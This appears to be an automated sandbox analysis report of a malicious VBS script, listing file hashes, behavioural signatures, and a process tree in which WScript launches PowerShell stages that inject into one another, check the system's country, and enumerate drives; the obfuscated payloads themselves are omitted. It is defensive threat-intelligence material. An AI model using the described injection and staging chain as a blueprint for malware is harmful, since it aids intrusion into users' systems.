Analysis
max time kernel: 143s
max time network: 121s
platform: windows10-2004_x64
resource: win10v2004-20230220-en
resource tags: arch:x64, arch:x86, image:win10v2004-20230220-en, locale:en-us, os:windows10-2004-x64, system
submitted: 08-03-2023 12:44
Static task: static1
Behavioral task: behavioral1
  Sample: 8e202dd319e539c455245f36a616428d29551dbda507754eac6394131ed5efbb.vbs
  Resource: win7-20230220-en
Behavioral task: behavioral2
  Sample: 8e202dd319e539c455245f36a616428d29551dbda507754eac6394131ed5efbb.vbs
  Resource: win10v2004-20230220-en
General
Target: 8e202dd319e539c455245f36a616428d29551dbda507754eac6394131ed5efbb.vbs
Size: 651KB
MD5: 65c6b20a71381300f06361a91f8a8600
SHA1: ad9405175b85333341975efc778190be711d998d
SHA256: 8e202dd319e539c455245f36a616428d29551dbda507754eac6394131ed5efbb
SHA512: 5d1f27bbfb79fd1627d84762ac4d39ce833580fc5ea5961ab0c1cf9c428b39f51780d9ddf4ae6e2bdb81e8d68984c92f0065921af27ac58442bd3f7bba1d040e
SSDEEP: 12288:PhBeNsxmLR4Bq/5QH3Oze+a0BiTreixCFnZ5l62PNEKyAKF3t:PbksmRbTzvS6HX5moKF3t
Malware Config
Signatures
Blocklisted process makes network request (1 IoC)
  flow | pid  | Process
  6    | 1272 | WScript.exe
Checks computer location settings (2 TTPs, 1 IoC)
  Looks up country code configured in the registry, likely geofence.
  description       | ioc                                                                                                | Process
  Key value queried | \REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\Control Panel\International\Geo\Nation | WScript.exe
Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
Suspicious behavior: EnumeratesProcesses (4 IoCs)
  pid  | Process
  4044 | powershell.exe
  4044 | powershell.exe
  2056 | powershell.exe
  2056 | powershell.exe
Suspicious use of AdjustPrivilegeToken (2 IoCs)
  description             | pid  | Process
  Token: SeDebugPrivilege | 4044 | powershell.exe
  Token: SeDebugPrivilege | 2056 | powershell.exe
Suspicious use of WriteProcessMemory (5 IoCs)
  description                      | pid  | Process        | procid_target
  PID 1272 wrote to memory of 4044 | 1272 | WScript.exe    | 85
  PID 1272 wrote to memory of 4044 | 1272 | WScript.exe    | 85
  PID 4044 wrote to memory of 2056 | 4044 | powershell.exe | 87
  PID 4044 wrote to memory of 2056 | 4044 | powershell.exe | 87
  PID 4044 wrote to memory of 2056 | 4044 | powershell.exe | 87
Processes
1. C:\Windows\System32\WScript.exe
   Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8e202dd319e539c455245f36a616428d29551dbda507754eac6394131ed5efbb.vbs"
   - Blocklisted process makes network request
   - Checks computer location settings
   - Suspicious use of WriteProcessMemory
   PID: 1272
2. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
   Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[long obfuscated PowerShell script passed as the argument; omitted]"
   - Suspicious behavior: EnumeratesProcesses
   - Suspicious use of AdjustPrivilegeToken
   - Suspicious use of WriteProcessMemory
   PID: 4044
3. C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
   Command line: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "[second-stage PowerShell script of hex-encoded strings passed as the argument; omitted]"
   - Suspicious behavior: EnumeratesProcesses
   - Suspicious use of AdjustPrivilegeToken
   PID: 2056
Network
MITRE ATT&CK Enterprise v6
Downloads
Filesize: 60B
MD5: d17fe0a3f47be24a6453e9ef58c94641
SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82